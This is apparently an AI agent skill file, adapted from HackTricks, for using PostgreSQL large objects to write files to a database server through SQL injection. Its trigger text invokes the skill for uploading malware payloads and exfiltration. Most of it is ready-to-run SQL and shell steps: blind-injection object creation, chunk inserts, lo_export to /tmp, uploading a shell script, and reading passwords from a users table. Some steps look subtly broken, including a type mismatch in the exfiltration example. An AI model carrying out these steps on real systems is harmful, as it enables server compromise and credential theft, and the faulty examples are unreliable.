Hacktricks-skills postgresql-large-object-upload

Upload binary files to PostgreSQL using large objects (pg_largeobject). Use this skill whenever you need to store files in PostgreSQL, exfiltrate data via SQL injection, upload malware payloads, or work with pg_largeobject, lo_creat, lo_import, lo_export functions. Trigger for any PostgreSQL file upload task, binary data storage, or when dealing with SQL injection scenarios requiring file operations.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql/SKILL.MD
source content

PostgreSQL Large Object Upload

This skill helps you upload binary files to PostgreSQL using the

pg_largeobject
table, which stores data in 2KB chunks. This is essential for SQL injection exploitation, data exfiltration, and file storage in PostgreSQL databases.

When to Use This Skill

  • Uploading files to PostgreSQL via SQL injection
  • Storing binary data (images, PDFs, executables) in PostgreSQL
  • Exfiltrating data through SQL injection vulnerabilities
  • Working with
    pg_largeobject
    ,
    lo_creat
    ,
    lo_import
    ,
    lo_export
  • Creating reverse shells or payloads in PostgreSQL

Core Concepts

Large Object Structure

PostgreSQL large objects store data in the

pg_largeobject
table with this structure:

  • loid: Large Object ID (unique identifier)
  • pageno: Page number (0-indexed, each page = 2KB)
  • data: Binary data chunk (exactly 2KB except possibly the last chunk)

Why 2KB Chunks?

The

lo_export()
function requires chunks to be exactly 2KB (2048 bytes) for proper reconstruction. The last chunk can be smaller.

Workflow

Step 1: Prepare Your File

Split your binary file into 2KB chunks:

# Use the bundled script
python scripts/chunk_file.py <input_file> <output_dir>

# Or manually
split -b 2048 your_file.txt chunks_

Step 2: Encode Chunks

Encode each chunk to Base64 or Hex for SQL insertion:

# Base64 (recommended - more compact)
python scripts/encode_chunks.py --format base64 chunks_*

# Hex (useful for certain injection contexts)
python scripts/encode_chunks.py --format hex chunks_*

Encoding size considerations:

  • Base64:
    ceil(n / 3) * 4
    bytes (e.g., 2KB → ~2.7KB)
  • Hex:
    n * 2
    bytes (e.g., 2KB → 4KB)

Step 3: Create Large Object

Choose your method based on your access level:

Method A:
lo_creat
(Standard)

-- Create a new large object (auto-generated LOID)
SELECT lo_creat(-1);

-- Note: Returns the LOID you'll need for subsequent operations

Method B:
lo_create
(Fixed LOID - for Blind SQLi)

-- Create with specific LOID (useful for blind SQL injection)
SELECT lo_create(173454);

Why fixed LOID? In blind SQL injection, you can't see the returned LOID. Using a fixed value lets you reference it in subsequent queries.

Step 4: Insert Data Chunks

Using Base64 (Recommended)

INSERT INTO pg_largeobject (loid, pageno, data) 
VALUES (173454, 0, decode('<base64_chunk_1>', 'base64'));

INSERT INTO pg_largeobject (loid, pageno, data) 
VALUES (173454, 1, decode('<base64_chunk_2>', 'base64'));

-- Continue for all chunks...

Using Hex

INSERT INTO pg_largeobject (loid, pageno, data) 
VALUES (173454, 0, decode('<hex_chunk_1>', 'hex'));

-- Or update existing pages
UPDATE pg_largeobject 
SET data = decode('<hex_chunk_1>', 'hex') 
WHERE loid = 173454 AND pageno = 0;

Step 5: Export to Filesystem

-- Export the large object to a file
SELECT lo_export(173454, '/tmp/your_file');

-- Clean up (optional but recommended)
SELECT lo_unlink(173454);

Alternative:
lo_import
Method

If you have filesystem access on the database server:

-- Import file directly (creates LOID automatically)
SELECT lo_import('/path/to/file');

-- Import with specific LOID
SELECT lo_import('/path/to/file', 173454);

Note:

lo_import
requires the database user to have read access to the file path on the database server.

SQL Injection Scenarios

Blind SQL Injection

When you can't see query results:

  1. Use fixed LOID (e.g., 173454)
  2. Insert chunks one at a time
  3. Use time-based or boolean-based checks to verify success
  4. Export when all chunks are inserted

Example time-based check:

-- If this succeeds, wait 5 seconds
SELECT CASE WHEN (SELECT count(*) FROM pg_largeobject WHERE loid=173454) > 0 
THEN pg_sleep(5) ELSE NULL END;

Error-Based SQL Injection

Use errors to confirm operations:

-- Trigger error if LOID doesn't exist
SELECT lo_export(173454, '/tmp/test');

Debugging

View Large Object Contents

-- See all chunks (escape encoding for readability)
SELECT loid, pageno, encode(data, 'escape') 
FROM pg_largeobject 
WHERE loid = 173454 
ORDER BY pageno;

-- Count chunks
SELECT loid, count(*) as chunk_count 
FROM pg_largeobject 
WHERE loid = 173454;

-- Check total size
SELECT loid, count(*) * 2048 as approx_size_bytes 
FROM pg_largeobject 
WHERE loid = 173454;

List All Large Objects

SELECT loid FROM pg_largeobject;

Limitations & Considerations

Access Control Lists (ACLs)

Large objects may have ACLs restricting access:

  • You may not be able to access objects you didn't create
  • Older objects might have permissive ACLs (useful for exfiltration)
  • Check permissions:
    SELECT * FROM pg_largeobject_metadata WHERE loid = <oid>

Required Privileges

  • lo_creat
    /
    lo_create
    : Requires
    CREATE
    privilege on the database
  • lo_export
    : Requires
    EXECUTE
    privilege on
    lo_export
  • lo_import
    : Requires
    EXECUTE
    privilege on
    lo_import
  • lo_unlink
    : Requires ownership or
    DELETE
    privilege

Size Limits

  • PostgreSQL large objects can store up to 4GB per object
  • Each chunk must be exactly 2KB (except the last)
  • Total chunks =
    ceil(file_size / 2048)

Quick Reference

OperationSQL CommandNotes
Create LO
SELECT lo_creat(-1)
Auto-generates LOID
Create LO (fixed)
SELECT lo_create(173454)
Use for blind SQLi
Insert chunk
INSERT INTO pg_largeobject...
2KB chunks
Export
SELECT lo_export(loid, '/path')
Write to filesystem
Delete
SELECT lo_unlink(loid)
Clean up
View chunks
SELECT * FROM pg_largeobject
Debug

Scripts

Use the bundled scripts to automate the workflow:

  • scripts/chunk_file.py
    - Split files into 2KB chunks
  • scripts/encode_chunks.py
    - Encode chunks to Base64 or Hex
  • scripts/generate_sql.py
    - Generate SQL INSERT statements

Run

python scripts/<script>.py --help
for usage details.

Examples

Upload a Shell Script

# 1. Chunk the file
python scripts/chunk_file.py /tmp/shell.sh /tmp/chunks/

# 2. Encode to Base64
python scripts/encode_chunks.py --format base64 /tmp/chunks/*

# 3. Generate SQL
python scripts/generate_sql.py --loid 173454 --format base64 /tmp/chunks/*

# 4. Execute SQL in your injection point
# 5. Export: SELECT lo_export(173454, '/tmp/shell.sh');

Exfiltrate Database Contents

-- 1. Create large object
SELECT lo_create(173455);

-- 2. Insert data from sensitive table
INSERT INTO pg_largeobject (loid, pageno, data)
SELECT 173455, 0, encode((SELECT password FROM users LIMIT 1), 'base64');

-- 3. Export
SELECT lo_export(173455, '/tmp/extracted.txt');

Troubleshooting

"Large object does not exist": The LOID doesn't exist or was already deleted. Create a new one.

"Permission denied": Check your privileges on

lo_export
and the target directory.

"Chunk size mismatch": Ensure all chunks except the last are exactly 2KB.

File corrupted after export: Verify chunk sizes and that all chunks were inserted in order.